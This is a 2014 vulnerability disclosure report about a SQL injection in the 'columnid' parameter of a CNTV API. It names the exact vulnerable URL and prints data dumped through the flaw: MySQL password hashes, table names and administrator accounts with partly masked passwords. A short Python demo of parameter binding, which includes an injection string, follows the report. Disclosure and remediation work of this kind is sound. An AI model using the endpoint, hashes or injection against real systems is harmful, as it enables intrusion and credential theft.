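2013-12-17: Details reported to the vendor; awaiting vendor handling
2013-12-17: Vendor confirmed; details disclosed to the vendor only
2013-12-27: Details disclosed to core white hats and experts in related fields
2014-01-06: Details disclosed to regular white hats
2014-01-16: Details disclosed to trainee white hats
2014-01-31: Details disclosed to the public
As the title says.
1) The tested injection point is shown below; the injectable parameter is columnid: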
http://api.cbox.cntv.cn/api/column_detail?pid=ukztYUybsWanMQcNKADef2gE9piG4h6d&version=1.0.4&columnid=C10336
2) Database information:
DB Server: MySQL >=5
Current User: api@cms24
Sql Version: 5.1.61-log
Current DB: mvs
System User: [email protected]
Host Name: cboxup9
DB User & Pass:
  root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:localhost
  api:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.7.3.%
Data Bases: information_schema mvs mysql test
Related tables:
VMS_COLUMN VMS_COLUMN_PENDING VMS_VIDEOINFO VMS_VIDEOINFO_PENDING VMS_VIDEOSET VMS_VIDEOSET_PENDING VMS_VIDEOSET_VIDEO_RELATION VMS_VIDEOSET_VIDEO_RELATION_PENDING YXG_CHANNEL mvs_area mvs_channel mvs_client mvs_client_home_subject mvs_client_television_stream mvs_client_type mvs_client_version mvs_client_version_channel mvs_content_type mvs_device mvs_epg mvs_feedback mvs_feedback_video mvs_focus_video mvs_home_subject mvs_home_subject_content mvs_media_type mvs_out_service_template mvs_player_recommend_content mvs_push_msg mvs_right mvs_role mvs_role_right_relation mvs_second_channel mvs_stat_area mvs_stat_basic mvs_stat_search mvs_stat_video mvs_subject_type mvs_syslogs mvs_syslogs_optype mvs_television_station mvs_user mvs_year stat_navigationbar stat_search stat_startup stat_video stat_vv
Administrator accounts:
id   user_name      user_password   user_email
5    caojundan      xxxxx3456       [email protected]
11   zhaoxuesong    cxxxxxxer...    [email protected]
14   wangxinli      qwxxxxx)        [email protected]
15   zhangjianan    4exxxxxtiao     [email protected]
16   rentao         Cb0xxxxx3       [email protected]
17   tanxiaoqiang   Cbxxxxx3        [email protected]
See the detailed description.
Filtering.
Severity: High
Vulnerability Rank: 15
Confirmation time: 2013-12-17 17:21
Thank you very much, we will remediate this service as soon as possible!~~ Thank you for your support and help!~~~
None yet.
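Added example, not part of the original report or the vendor's code: the repair suggestion in this report is input filtering on `columnid`; the sketch below pairs an allowlist check with a bound parameter, next to the string-concatenation pattern that typically produces this class of bug. It assumes an ID shape inferred from the sample value C10336, uses in-memory SQLite as a stand-in for the MySQL backend, and the column names of VMS_COLUMN and all function names are hypothetical.

```python
import re
import sqlite3

# Assumed ID shape, inferred from the single sample value C10336 in the report.
COLUMN_ID_RE = re.compile(r"[A-Z][0-9]{1,10}")


def make_demo_db():
    """In-memory stand-in for the MySQL backend; column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE VMS_COLUMN (column_id TEXT PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO VMS_COLUMN VALUES (?, ?)",
        [("C10336", "constructed row A"), ("C10337", "constructed row B")],
    )
    return db


def column_detail_concat(db, columnid):
    """The flawed pattern (assumed): request input spliced into the SQL text."""
    sql = "SELECT column_id, title FROM VMS_COLUMN WHERE column_id = '%s'" % columnid
    return db.execute(sql).fetchall()


def bound_without_validation(db, columnid):
    """Binding alone already keeps the value out of the SQL grammar."""
    sql = "SELECT column_id, title FROM VMS_COLUMN WHERE column_id = ?"
    return db.execute(sql, (columnid,)).fetchall()


def column_detail_bound(db, columnid):
    """Hardened: allowlist check first, then a bound parameter."""
    if not isinstance(columnid, str) or not COLUMN_ID_RE.fullmatch(columnid):
        raise ValueError("invalid columnid")
    return bound_without_validation(db, columnid)


if __name__ == "__main__":
    db = make_demo_db()
    crafted = "C10336' OR '1'='1"  # constructed input that rewrites the WHERE clause
    print(len(column_detail_concat(db, crafted)))  # concatenation: all rows match
    print(bound_without_validation(db, crafted))   # binding: compared as a literal
    print(column_detail_bound(db, "C10336"))       # normal lookup still works
```

Filtering on its own depends on the pattern staying correct for every future ID format; the bound parameter is what removes the injection, and the allowlist is a second layer that rejects malformed requests early.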